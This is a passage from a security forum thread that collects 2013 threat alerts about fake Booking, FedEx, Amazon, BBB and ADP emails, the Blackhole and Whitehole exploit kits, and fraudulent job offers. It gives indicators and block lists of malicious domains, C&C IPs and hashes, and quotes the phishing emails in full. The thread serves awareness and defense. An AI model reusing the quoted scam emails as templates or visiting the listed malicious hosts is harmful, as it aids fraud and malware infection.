Upon successful client-side exploitation, the campaign drops MD5: 9356fcd388b4bae53cad7aea4127d966 * ...W32/Injector.YMS!tr..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/d97f042474a0b1814fd681dca3ec2c5edf7054acff979f585a044478bc7c5cbd/analysis/
File name: test53356736863192.bin
Detection ratio: 3/46
Analysis date: 2013-01-28
___
Fake American Airlines email
- http://msmvps.com/blogs/spywaresucks/archive/2013/01/25/1823091.aspx
Jan 25 2013 - "This is -not- a real American Airlines / American Eagle email:
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/0523.image_5F00_thumb_5F00_380EFE9A.png
These types of spoof emails still work, fooling too many people. As always, if you hover your mouse cursor over the hyperlink it becomes easy to tell that the email is not legitimate.
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/5483.image_5F00_thumb_5F00_21200751.png
___
Dear Facebook, this change sucks
- http://msmvps.com/blogs/spywaresucks/archive/2013/01/03/1822008.aspx
Jan 3 2013 - "1. I don’t want to receive emails (aka most likely SPAM) from strangers.
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/0844.image_5F00_thumb_5F00_15139385.png
2. Your “control who can send you messages” link is broken.
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/3426.image_5F00_thumb_5F00_7E249C3B.png
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/5355.image_5F00_thumb_5F00_2B09D94A.png
Filed under: I ain't happy about this*...
* http://msmvps.com/blogs/spywaresucks/archive/tags/I+ain_2700_t+happy+about+this_2E00__2E00__2E00__2E00__2E00_/default.aspx
:fear::fear:
AplusWebMaster
2013-02-01, 13:12
FYI...
Fake Booking .com ‘Credit Card was not Accepted’ emails lead to malware
- http://blog.webroot.com/2013/02/01/fake-booking-com-credit-card-was-not-accepted-themed-emails-lead-to-malware/
Feb 1, 2013 - "Cybercriminals are mass mailing tens of thousands of emails, impersonating Booking .com, in an attempt to trick its users into thinking that their credit card was not accepted. Users are then urged to click on a fake “Print Booking Details” link, which leads them to the malware used in the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_booking_credit_card_not_accepted_hotel_reservation_email_spam_malware.png
... Sample detection rate for the malicious executable: MD5: 75db84cfb0e1932282433cdb113fb689 * ... TrojanDownloader:Win32/Kuluoz.B...
Once executed, the sample phones back to the following command and control (C&C) servers:
hxxp:// 66.232.145.174 :6667...
hxxp:// 175.45.142.15 :8080...
hxxp:// 66.84.10.68 :8080...
hxxp:// 202.169.224.202 :8080...
hxxp:// 89.19.20.202 :8080...
hxxp:// 74.208.111.15 :8080...
hxxp:// 85.214.50.161 :8080
hxxp:// 184.106.214.159 :8080
hxxp:// 46.4.178.174 :8080
hxxp:// 217.11.63.194 :8080
hxxp:// 82.113.204.228 :8080
hxxp:// 85.214.22.38 :8080
hxxp:// 202.153.132.24 :8080
hxxp:// 85.186.22.146 :8080
hxxp:// 77.79.81.166 :8080
hxxp:// 84.38.159.166 :8080
hxxp:// 81.93.248.152 :8080
hxxp:// 118.97.15.13 :8080 ...
More malware variants are known to have phoned back to the same IPs..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/1fccbab2964e9f0afa46efacfabcd92fb7d655a59d8a33285ca98d00632b50e6/analysis/1359641226/
File name: BookingInfo.exe
Detection ratio: 26/46
Analysis date: 2013-01-31
___
Fake Photo SPAM / eghirhiam .ru
- http://blog.dynamoo.com/2013/02/photos-spam-eghirhiamru.html
1 Feb 2013 - "Here's a tersely-worded Photos spam leading to malware on eghirhiam .ru:
Subject: Photos
Good day,
your photos here http: //www.jonko .com/photos.htm
As is usually the case, the malware -bounces- through a legitimate hacked site and in this case ends up at [donotclick]eghirhiam .ru:8080/forum/links/public_version.php (report here) hosted on:
82.148.98.36 (Qatar Telecom, Qatar)
195.210.47.208 (PS Internet Company Ltd, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)
The following IPs and domains are all related and should be blocked:
82.148.98.36
195.210.47.208
202.72.245.146
bananamamor.ru
damagalko .ru
dekamerionka .ru
dfudont .ru
disownon .ru
dmpsonthh .ru
dmssmgf .ru
dumarianoko .ru
eghirhiam .ru
epiratko .ru
esekundi .ru
evkotnka .ru
evskindarka .ru
evujalo .ru
exiansik .ru
eziponoma .ru ..."
___
Something evil on 50.116.40.194
- http://blog.dynamoo.com/2013/02/something-evil-on-5011640194.html
1 Feb 2013 - "50.116.40.194 (Linode, US) is hosting the Blackhole Exploit Kit (e.g. [donotclick]14.goodstudentloans .org/read/walls_levels.php - report here*) and seems to have been active in the past 24 hours. I can see two domains at present, although there are probably many more ready to go:
14.goodstudentloans .org
14.mattresstoppersreviews .net"
* http://urlquery.net/report.php?id=903191
:fear: :mad:
AplusWebMaster
2013-02-04, 14:26
FYI...
Fake StumbleUpon SPAM / drugstorepillstablets .ru
- http://blog.dynamoo.com/2013/02/stumbleupon-spam-drugstorepillstabletsru.html
4 Feb 2013 - "This fake StumbleUpon spam is something new, it leads to a fake pharma site on drugstorepillstablets .ru:
Date: Mon, 4 Feb 2013 01:01:46 -0600 (CST)
From: StumbleUpon [no-reply @stumblemail .com]
Subject: Update: Changes to Your Email Settings
Hi [redacted],
This is a quick note to let you know about some changes we've made to the email settings in your StumbleUpon account. We've created a bunch of new notification options that allow you to have more control over what types of emails you'll receive from us. These new notification options are not compatible with the old settings, so your settings have been reset. We apologize for any inconvenience, and want to make sure we only send you the emails you want to receive.
Now what? Please click here to head over to your email settings and update your preferences, so we know exactly what emails you'd like to receive from StumbleUpon.
Want to receive all notifications about shares from friends, recommended Stumbles, and more? Great, you don't have to do anything at all!
Thanks for Stumbling,
The StumbleUpon Team
P.S. Haven't signed in for a while and can't remember your password? You can reset it here by entering the email address used in this email.
Please don't reply to this message - for all questions, check out our Help Center. To visit your email settings, please click here.
StumbleUpon | 301 Brannan Street, 6th Floor, San Francisco, CA 94107
There's no surprise to see that the IP address of the spamvertised site is 92.48.119.139 (Simply Transit, UK)..."
(More detail at the dynamoo URL above.)
___
Something evil on 108.61.12.43 and 212.7.192.100
- http://blog.dynamoo.com/2013/02/something-evil-on-108611243-and.html
4 Feb 2013 - "A few sites worth blocking on 108.61.12.43 (Constant Hosting, US) courtesy of Malware Must Die*:
helloherebro .com
painterinvoice .ru
painterinvoicet .ru
immediatelyinvoicew .ru
While you are at it, you might like to block 212.7.192.100** (Dediserv, Netherlands) as well."
* http://malwaremustdie.blogspot.co.uk/2013/02/the-infection-of-styx-exploit-kit.html
** http://malwaremustdie.blogspot.co.uk/2013/01/peeking-at-jdb-exploit-kit-infector.html
___
Phytiva / XCHC pump-and-dump SPAM
- http://blog.dynamoo.com/2013/02/phytiva-xchc-pump-and-dump.html
4 Feb 2013 - "This pump-and-dump spam (at least I assume that's what it is) caught my eye:
From: Hugh Crouch [tacticallyf44 @riceco .com]
Date: 4 February 2013 12:39
Subject: RE: Targeting the global Cosmoceutical market
US leading biotech company is please to introduce a newly launched brand - a hybrid of a proven, existing product line that has been well-managed and conservatively-run for over a decade with a hemp-based product line, utilizing the unique and potent benefits of the plants. Revolutionary formulations target not just the symptom, but also the cause. The plant is the ideal basis for healing solutions and has been utilized for centuries, as skin responds extremely well to its properties.
Its newest Plant based Product lines that have identified over a dozen ailments that we believe that the products will be the superior choice on the market. These ailments include cancer, arthritis, influenza, HIV/ AIDS, PTSD and many more.
We are looking for leading beauty and health care investors. If you are dedicated to making difference in people”s lives, we need your help now more than ever before toprovide excellent and efficient medical and health care for our future researches.
For more information, please visit
You can unsubscribe from all our future email communications at
The email originates from 31.25.91.159 in the Islamic Republic of Iran, spamvertising a site at www .xn--80aakfmpm2afbm .xn--p1ai (yes, that's a valid international domain name) hosted on 111.123.180.11 in China. In all likelihood, Phytiva and its parent company The X-Change Corporation (stock ticker XCHC) are almost definitely nothing to do with this rather odd spam. Avoid."
___
Fake FedEx emails lead to malware
- http://blog.webroot.com/2013/02/04/fake-fedex-tracking-idtracking-numbertracking-detail-themed-emails-lead-to-malware/
Feb 4, 2013 - "... the digital fingerprint of one of the most recently introduced malware variants used in the campaign corresponds to the digital fingerprint of a malware-serving campaign that we’ve already profiled, indicating that they’ve been launched by the same cybercriminal/gang of cybercriminals...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_fedex_trackingid_trackingnumber_trackingdetail_spam_email_malware.png
... Detection rate for the malware variants distributed over the past 24 hours:
MD5: bf061265407ea1f7c21fbf5f545c4c2b * ...PAK_Generic.001
The campaign is ongoing, so watch what you click on!..."
(More detail at the websense URL above.)
* https://www.virustotal.com/file/603b65c612b2e65e420679094fdf351e5b649fb1d8d57cda413c3c712749a2a2/analysis/
File name: ukjlbkma.exe
Detection ratio: 30/46
Analysis date: 2013-02-04
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Tax Documents Notification E-mail Messages - February 04, 2013
Fake Apple Coupon Offer E-mail Messages - February 04, 2013
Malicious Attachment E-mail Message - February 04, 2013
Fake Product Order Request E-mail Messages - February 04, 2013
Fake Portuguese Money Deposit E-mail Messages - February 04, 2013
Fake Purchase Order Notification E-mail Messages - February 04, 2013
Fake Product Order E-mail Message - February 04, 2013
Fake Telegraphic Transfer E-mail Messages - February 04, 2013
Fake Money Transfer Notification E-mail Messages - February 04, 2013
Malicious Personal Photograph Attachment E-mail Messages - February 04, 2013
Malicious Personal Pictures Attachment E-mail Messages - February 04, 2013
Fake Xerox Scan Attachment E-mail Messages - February 04, 2013
(More detail and links at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-02-05, 15:18
FYI...
Fake ‘Your Kindle e-book Amazon receipt’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/02/05/your-kindle-e-book-amazon-receipt-themed-emails-lead-to-black-hole-exploit-kit/
5 Feb 2013 - "Kindle owners, watch what you click on! Cybercriminals are currently attempting to trick Kindle owners into thinking that they’ve received a receipt from an E-book purchase from Amazon .com. In reality, when users click on -any- of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/email_spam_exploits_malware_amazon_kindle_ebook_receipt_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
starsoftgroup.net – 175.121.229.209; 198.144.191.50 – Email: wondermitch @hotmail .com
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
We’ve already seen the same name servers used in the following previously profiled campaigns, indicating that they’ve been launched by the same cybercriminals... Upon successful client-side exploitation, the campaign drops MD5: 13d23f4c1eb1d4d3841e2de50b1948cc * ... UDS:DangerousObject.Multi.Generic...
Upon execution, the sample also phones back to the following C&C servers:
hxxp :// 195.191.22.90 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
hxxp :// 37.122.209.102 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
hxxp :// 217.65.100.41 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
hxxp :// 173.201.177.77 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
hxxp :// 210.56.23.100 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
hxxp :// 213.214.74.5 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
hxxp :// 180.235.150.72 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
We’ve already seen the same pseudo-random C&C communication characters (DPNilBA) used... As well as the same C&C server IPs (173.201.177.77; 210.56.23.100; 180.235.150.72) ...
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/74bd78604851d43853035e20e1a96df398e6f91a92df6988b067c5e39af4e6a2/analysis/
File name: DWIntl20.Dll
Detection ratio: 7/46
Analysis date: 2013-02-04
___
Free Disneyland Tickets Survey SCAM
- http://www.hoax-slayer.com/disneyland-tickets-survey-scam.shtml
Feb 5, 2013
Outline: Various -Facebook- messages claim that users can receive free tickets to Disneyland by liking and sharing a picture and participating in online surveys.
Brief Analysis: The supposed giveaways are scams designed to trick people into spamming their friends and participating in -bogus- online surveys. No matter how many surveys they complete, participants will -never- receive the promised Disneyland tickets. These offers are not endorsed by and have no connection to Disney. If you receive one of these messages, do not click any links that it contains.
> http://www.hoax-slayer.com/images/disneyland-tickets-scam.jpg
___
Fake Amazon .com SPAM / salam-tv .com
- http://blog.dynamoo.com/2013/02/amazoncom-spam-salam-tvcom.html
5 Feb 2013 - "This fake Amazon email leads to malware on salam-tv .com:
Date: Tue, 5 Feb 2013 18:32:06 +0100
From: "Amazon.com Orders" [no-reply @amazon .com]
Subject: Your Amazon.com order receipt.
Click here if the e-mail below is not displayed correctly.
Follow us:
Your Amazoncom Today's Deals See All Departments
Dear Amazon.com Customer,
Thanks for your order, [redacted]!
Did you know you can view and edit your orders online, 24 hours a day? Visit Your Account.
Order Details:
E-mail Address: [redacted]
Billing Address:
1170 CROSSING CRK N Rd.
Fort Wayne OH 49476-1748
United States
Phone: 1- 749-787-0001
Order Grand Total: $ 91.99
Earn 3% rewards on your Amazon .com orders with the Amazon Visa Card. Learn More
Order Summary:
Details:
Order #: C59-2302433-5787713
Subtotal of items: $ 91.99
Total before tax: $ 91.99
Tax Collected: $0.00
Grand Total: $ 90.00
Gift Certificates: $ 1.99
Total for this Order: $ 91.99
Find Great Deals on Millions of Items Storewide
We hope you found this message to be useful. However, if you'd rather not receive future e-mails of this sort from Amazon.com, please opt-out here.
2012 Amazon.com, Inc. or its affiliates. All rights reserved. Amazon, Amazon .com, the Amazon .com logo and 1-Click are registered trademarks of Amazon .com, Inc. or its affiliates. Amazon .com, 466 Sally Ave. N., Seattle, MA 71168-8282. Reference: 25090571
Please note that this message was sent to the following e-mail address: [redacted]
The malicious payload should be at [donotclick]salam-tv .com/detects/visit_putts.php but at the moment this domain doesn't seem to be resolving properly. A bit of digging around shows that it may be hosted on 198.144.191.50 (Chicago VPS, US) and the following malicious domains can be traced to that IP address:
morepowetradersta .com
capeinn .net
starsoftgroup .net
salam-tv .com "
___
Malwarebytes uncovers digital certificate-spoofing Trojan
- http://blog.malwarebytes.org/intelligence/2013/02/digital-certificates-and-malware-a-dangerous-mix/
Update (Feb 4th, 3:44 PM): Egnyte has promptly taken down the illicit account following our call. However, digital signature is still in use.
"... we just spotted a new malware sample (Brazilian banking/password stealer) which happens to be signed with a real and valid digital certificate issued by DigiCert:
> http://blog.malwarebytes.org/wp-content/uploads/2013/02/digi1.png
This certificate is issued to a company called “Buster Paper Comercial Ltda”, a Brazilian company that actually does -not- exist and was registered with bogus data... The file – disguised as a PDF document (an invoice) – actually opens up as such to really fool the victim:
> http://blog.malwarebytes.org/wp-content/uploads/2013/02/invoice.png
... the malware connects to: som.egnyte .com ... size matters as many antivirus scanners have trouble with detecting larger files. Digging a little deeper, this is not a new case at all. In fact, last November the same kind of digitally signed Trojan was also distributed (See this ThreatExpert report* for proof). Its certificate has, since then, been revoked... What we have here is a total abuse of hosting services, digital certificates and repeated offenses from the same people... Digital certificate theft can be used in targeted attacks as a spear phishing attack for example...An attacker can easily find out or guess what antivirus a company is running and craft a piece of malware that will not be detected by it. Because such attacks are very narrow, the sample will not be disseminated around the world, making its discovery less likely..."
* http://www.threatexpert.com/report.aspx?md5=cff3b8ec4c49051811213d3551eb3c28
:mad: :fear:
AplusWebMaster
2013-02-06, 16:22
FYI...
Fake job offer inukjob .com, ineurojob .com and hollandsjob .com
- http://blog.dynamoo.com/2013/02/inukjobcom-fake-job-offer-also.html
6 Feb 2013 - "This fake job offer from inukjob .com involves illegal money laundering, and it also seems that the scammers want to use your identity for "correspondence" which normally means things like reshipping stolen goods and identity theft.
From: Victim
To: Victim
Date: 6 February 2013 09:16
Subject: Looking for remote assistants, paid $ 100 per hour helping other people
Good afternoon!
Is it possible for you to spare a few hours a week to the new occupation, which would increase your wages in 2-3 times, without investing a penny? While you are looking for the trick in this offer, hundreds of your compatriots have already been reaping the benefits of working with us.
This is not a financial pyramid or marketing of any kind. It's about doing simple assignments, not exceed the limits of morals or ethics.
Your gender, age, employment do not matter - the main factors are your diligence and conscientiousness.
Lots of our employees began with a part-time employment and combined with other jobs, but two weeks later,
most of them devoted themselves to our job.
We are in all respects ready to remove all your doubts and help you to understand all details.
Position is called the "Regional Manager".
Functional duties:
- to represent the interests of foreign companies in the region (For example: providing your address for correspondence.)
- to take control of transactions between the company and the client in your area.
For more information, please, email us attaching your CV, the country and city of residence.
It will considerably increase your chances for employment. Email: Kelsey @inukjob .com
Best Regards,
PR Manager
I've seen another variant with a reply address of Delores @inukjob .com. In all these cases, the email appears to come from the victim (here's why*). Let's dig a little deeper into the domain. It turns out that it is registered by scam-friendly Chinese registrar BIZCN .COM. The WHOIS details are fake:
Tara Zwilling info @inukjob .com
315-362-4562 fax: 315-362-4511
3201 Oak Street
Syracuse NY 13221
us
There is -no- number 3201 Oak Street in Syracuse, New York (see for yourself**) and the Zip code is incorrect, it should be 13203 and -not- 13221. There's -no- web site, mail is handled by a server at 31.214.169.94 (Exetel, Germany). The following mailservers can be found at that IP:
mx.ineurojob .com
mx.hollandsjob .com
mx.inukjob .com
You can assume that all these domains are fraudulent. If we dig a little deeper at the namesevers ns1.ariparts .net (also on 31.214.169.94) and ns2.ariparts .net (8.163.20.161, Level 3, US), then we can also find the following very dodgy domains:
hollandsjob .com
pracapolsk .com
ariparts .net
ineurojob .com
All these domains have fake or hidden registration details and can assume to be part of a scam. Avoid."
* http://blog.dynamoo.com/2011/09/why-am-i-sending-myself-spam.html
** http://goo.gl/maps/KimC4
___
Google store - malicious apps
- http://blog.webroot.com/2013/02/05/android-security-tips-and-windows-autorun-protection/
5 Feb 2013 - "Recently, two applications designed with malicious intent were discovered within the Google Play application store. The apps were built with a façade of being utility cleaners designed to help optimize Android-powered phones, but in reality, both apps had code built in designed to copy private files, including photos, and submit them to remote servers. The applications, named SuperClean and DroidClean, did not stop there. Researchers also found that the malware was able to AutoRun on Windows PC devices when the phones were paired, and infect the main computer. The malware was designed to record audio through the computer’s microphone. AutoRun has often been used as a method of infection, and Microsoft has since sent a security fix out to Windows XP/Vista/7 in order to disable the exploitable element. In some cases, however, the feature might have been re-enabled by the user for convenience or never changed through a backlog of updates. An application such as this has not been seen in the past, and is showing the creative methods through which malware coders are attempting to break through a computer’s security. With the Android device acting as a Trojan horse for the infection, malicious code has the potential of bypassing established security parameters that typically keep endpoint users safe within their network. While Webroot has classified the malicious apps, which have been removed from Google Play’s market, it goes to show that protective steps are necessary on all levels of devices to avoid an infection... For all users, we recommend ensuring that AutoRun is -disabled- on your computer. Even though Microsoft rolled out updates to disable, it is possible it could be enabled. Finally, always ensure you scan USB and other connected devices for malware before storing data or using on other PCs."
:mad: :mad:
AplusWebMaster
2013-02-07, 15:26
FYI...
Fake FFIEC SPAM / live-satellite-view .net
- http://blog.dynamoo.com/2013/02/ffiec-spam-live-satellite-viewnet.html
7 Feb 2013 - "This spam attempts to load malware from live-satellite-view .net, but fails because at the moment the domain isn't registered. However, you can expect them to try again.. so watch out for emails like this.
From: FFIEC [mailto:complaints @ffiec .gov]
Sent: 06 February 2013 16:17
Subject: FFIEC Occasion No. 77715
This summons is meant to make advise of file # 77715 which is opened and under interrogative with FFIEC following a accusation of your Financial Institution regarding suspect financial activity on your account.
A hard copy of this judicial process will be delivered to your business address.
Our institution will forward information to competent government agencies following this accusation.
Information and contacts regarding your Occasion file # can be found at
Occasion Number: 77715
Observed by
Federal Financial Institution Examination Council
Emily Gray
The attempted download is from [donotclick]live-satellite-view .net/detects/advanced_selected_determines_comparison.php although it fails to resolve. Perhaps the registrar nuked the domain? However, it is possible to tell that the nameservers were ns1.http-page .net and ns2.http-page .net, and up investigate it turns out that all the following IPs and domains are related and should be treated as malicious:
7.129.51.158
31.170.106.17
74.4.6.128
98.144.191.50
175.121.229.209
198.144.191.50
208.117.43.145
222.238.109.66
able-stock .net
capeinn .net
duriginal .net
euronotedetector .net
gonita .net
gutprofzumbns .com
http-page .net
live-satellite-view .net
morepowetradersta .com
ocean-movie .net
starsoftgroup .net
vespaboise .net "
___
Ransomware Spam Pages on Github, Sourceforge, Others
- http://www.gfi.com/blog/ransomware-spam-pages-on-github-sourceforge-others/
Feb 7, 2013 - "There’s currently a large and determined effort to infect computers with Ransomware, courtesy of the Stamp EK exploit kit... The bait for most of these redirects to Ransomware appears to be a slice of US news reporters in various “fake” (ie nonexistent) nude pictures, along with a smattering of film actresses / singers – in other words, the usual shenanigans. Curiously, we’ve observed a lot of wrestlers / people involved in the wrestling industry listed on many of the spam pages too... There are pages and pages of ripped content sitting on various websites such as one located on a .ua domain... So far we have observed Weelsof and Reveton Ransomware being dropped. The below piece of Ransomware is demanding $300 to “Unlock your computer and avoid other legal consequences”. As with other similar forms of Ransomware, it accuses the user of accessing illegal pornography and makes no bones about the fact that they should be paying up “or else”... Unfortunately much of the same content can currently be found on both Github and Sourceforge, typically in the form of a Youtube page or a collection of sex pictures lifted from a real porn site. We’ve also seen air rifle stores, a rip of a Windows for Dummies site, Twitter pages and a whole lot more besides. A lot of these pages seem to be in the process of being taken down, but there’s still enough floating around out there to be a problem..."
(Screenshots available at the gfi URL above.)
___
Telepests... Robocalls ...
- http://blog.dynamoo.com/2013/02/20-3-2983245-telepest.html
7 Feb 2013 - "For some reason I've been plagued with cold calling telepests recently. This particular one (+20 3 2983245) offered the usual "press 5 to be ripped off" and "press 9 to try to unsubscribe which we will ignore" recorded message about claiming for an accident. There was a very politely spoken and nice young man on the end of the phone. He seemed a bit perplexed and upset when I told him to f**k off and leave me alone. Good. I don't know exactly who is behind this nuisance activity, but they were calling a TPS-registered phone from a number in Alexandria, Egypt. Offshoring fraudulent activity like this is quite common, but this is the first time that I've had to swear at an Egyptian. Perhaps the poor guy will consider doing something less scummy instead."
- https://www.bbb.org/blog/2013/01/consumers-phones-being-flooded-with-annoying-robocalls/
> http://www.ftc.gov/bcp/edu/microsites/robocalls/
___
Whitehole Exploit Kit in-the-wild...
- http://blog.trendmicro.com/trendlabs-security-intelligence/whitehole-exploit-kit-emerges/
Feb 6, 2013 - "... there is news of an emerging exploit kit dubbed Whitehole Exploit Kit. The name Whitehole Exploit Kit is just a randomly selected name to differentiate it from BHEK. While it uses similar code as Blackhole Exploit kit, BHEK in particular uses JavaScript to hide its usage of plugindetect.js, while Whitehole does not. It directly uses it without obfuscating this. We analysed the related samples, including the exploit malware cited in certain reports. The malware (detected as JAVA_EXPLOYT.NTW) takes advantage of the following vulnerabilities to download malicious files onto the system:
• CVE-2012-5076
• CVE-2011-3544
• CVE-2012-4681
• CVE-2012-1723
• CVE-2013-0422
Worth noting is CVE-2013-0422, which was involved in the zero-day incident that distributed REVETON variants and was used in toolkits like the Blackhole Exploit Kit and Cool exploit kit. Because of its serious security implication, Oracle immediately addressed this issue and released a software update, which was received with skepticism. The downloaded files are detected as BKDR_ZACCESS.NTW and TROJ_RANSOM.NTW respectively. ZACCESS/SIRIEF variants are known bootkit malware that download other malware and push fake applications. This specific ZACCESS variant connects to certain websites to send and receive information as well as terminates certain processes. It also downloads additional malicious files onto already infected systems. On the other hand, ransomware typically locks systems until users pay a sum of money via specific payment modes... Whitehole Exploit Kit is purportedly under development and runs in “test-release” mode. However, the people behind this kit are already peddling the kit and even command a fee ranging from USD 200 to USD 1800. Other notable features of this new toolkit include its ability to evade antimalware detections, to prevent Google Safe Browsing from blocking it, and to load a maximum of 20 files at once. Given Whitehole’s current state, we may be seeing more noteworthy changes to the exploit kit these coming months. Thus, we are continuously monitoring this threat for any developments..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Wire Transfer Notification E-mail Messages - February 07, 2013
Fake Real Estate Offer E-mail Messages - February 07, 2013
Fake Money Transfer Notification E-mail Messages - February 07, 2013
Fake Debt Collection E-mail Messages - February 07, 2013
Fake Money Transfer Notification E-mail Messages - February 07, 2013
Malicious Attachment E-mail Messages - February 07, 2013
Fake Product Order Quotation Attachment E-mail Messages - February 07, 2013
(More detail and links available at the cisco URL above.)
:mad:
AplusWebMaster
2013-02-08, 18:14
FYI...
radarsky .biz and something evil on 5.135.67.160/28
- http://blog.dynamoo.com/2013/02/radarskybiz-and-something-evil-on.html
8 Feb 2013 - "There is currently an injection attack -redirecting- visitors to a domain radarsky .biz (for example) hosted on 5.135.67.173 (OVH*) and suballocated to:
inetnum: 5.135.67.160 - 5.135.67.175
netname: MMuskatov-FI
descr: MMuskatov
country: FI
org: ORG-OH6-RIPE
admin-c: OTC15-RIPE
tech-c: OTC15-RIPE
status: ASSIGNED PA
mnt-by: OVH-MNT
source: RIPE # Filtered
"MMuskatov" was involved in this attack too, and a quick inspection of 5.135.67.160/28 doesn't look promising, you might want to block it and 5.135.67.144/28 and 5.135.67.192/28 as well. A deeper analysis is in progress."
* https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 7580 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-02-08, and the last time suspicious content was found was on 2013-02-08... we found 518 site(s) on this network... that appeared to function as intermediaries for the infection of 3631 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1465 site(s)... that infected 7340 other site(s)..."
___
Fake ACH Batch Download Notification emails
- http://security.intuit.com/alert.php?a=71
2/8/13 - "People are receiving fake emails with the title "ACH Batch Download Notification". Below is a copy of the email people are receiving, including the mistakes shown.
Refund check in the amount of $4,370.00 for
The following ACH batch has been submitted for processing.
Initiated By: colleen
Initiated Date & Time: Fri, 8 Feb 2013 21:38:16 +0600 Batch ID: 7718720 Batch Template Name: PAYROLL
Please view the attached file to review the transaction details.
This is the end of the fake email..."
___
Fake BBB SPAM / madcambodia .net
- http://blog.dynamoo.com/2013/02/bbb-spam-madcambodianet.html
8 Feb 2013 - "This fake BBB spam leads to malware on madcambodia .net:
Date: Fri, 8 Feb 2013 11:55:55 -0500 [11:55:55 EST]
From: Better Business Bureau [notify @bbb .org]
Subject: BBB details about your cliente's pretense ID 43C796S77
Better Business Bureau ©
Start With Trust ©
Thu, 7 Feb 2013
RE: Issue No. 43C796S77
[redacted]
The Better Business Bureau has been booked the above mentioned claim letter from one of your purchasers in respect of their business contacts with you. The detailed description of the consumer's concern are available for review at a link below. Please pay attention to this subject and let us know about your judgment as soon as possible.
We pleasantly ask you to visit the GRIEVANCE REPORT to reply on this claim.
We awaits to your prompt response.
Best regards
Luis Davis
Dispute Advisor
Better Business Bureau
3073 Wilson Blvd, Suite 600 Arlington, VA 23501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is at [donotclick]madcambodia .net/detects/review_complain.php (report here) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US) ..."
___
Fake ADP SPAM / 048575623_02082013 .zip
- http://blog.dynamoo.com/2013/02/adp-spam-04857562302082013zip.html
8 Feb 2013 - "This fake ADP spam comes with a malicious attachment:
Date: Fri, 8 Feb 2013 18:26:05 +0100 [12:26:05 EST]
From: "ops_invoice @adp .com" [ops_invoice @adp .com]
Subject: ADP Payroll Invoice for week ending 02/08/2013 - 01647
Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Thank you for choosing ADP Payroll.
Important: Please do not respond to this message. It comes from an unattended mailbox.
In this case there was a ZIP file called 048575623_02082013 .zip (this may vary) with an attachment 048575623_02082013 .exe designed to look like a PDF file. VirusTotal* identifies it as a Zbot variant. According to ThreatExpert**, the malware attempts to connect to the following hosts:
eyon-neos .eu
quest.social-neos .eu
social-neos .eu
These may be legitimate hacked domains, but if you are seeing unexpected traffic going to them then it could be a Zbot indicator.
* https://www.virustotal.com/file/d961194f9691fdde3d7ce2b1a49781ddc2df88136c62238c02268c2566aea288/analysis/1360370000/
File name: 048575623_02082013.exe
Detection ratio: 17/45
Analysis date: 2013-02-09
** http://www.threatexpert.com/report.aspx?md5=22fe0ab14da8c14d1e0342013e5d0ad0
:fear: :mad:
AplusWebMaster
2013-02-11, 12:26
FYI...
Fake "Support Center" SPAM / phticker .com
- http://blog.dynamoo.com/2013/02/support-center-spam-phtickercom.html
11 Feb 2013 - "Not malware this time, but this fake "Support Center" spam leads to a fake pharma site at phticker .com:
Date: Mon, 11 Feb 2013 06:13:52 -0700
From: "Brinda Wimberly" [noreply @mdsconsulting .be]
Subject: Support Center
Welcome to Help Support Center
Hello,
You have been successfully registered in our Ticketing System
Please, login and check status of your ticket, or report new ticket here
See All tickets
Go To Profile
This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.
The site appears to be clean from a malware perspective and is hosted on 171.25.190.246 (Verus AS, Latvia) along with other fake pharma sites..."
___
Something evil on 46.163.79.209
- http://blog.dynamoo.com/2013/02/something-evil-on-4616379209.html
11 Feb 2013 - "The following sites are connected with some ADP-themed malware that has been doing the rounds for the past few days. As far as I can tell, they are some sort of download server for this malware, hosted on 46.163.79.209 (Host Europe, Germany), it all looks quite nasty.
social-neos .eu
cloud.social-neos .eu
quest.social-neos .eu
archiv.social-neos .eu
eyon-neos .eu
international.eyon-neos .eu
ns.eyon-neos .eu
euroherz.eyon-neos .eu
The domains look like they might be legitimate ones that have been hijacked, nonetheless blocking them would be an excellent move."
___
Fake Citi Group SPAM
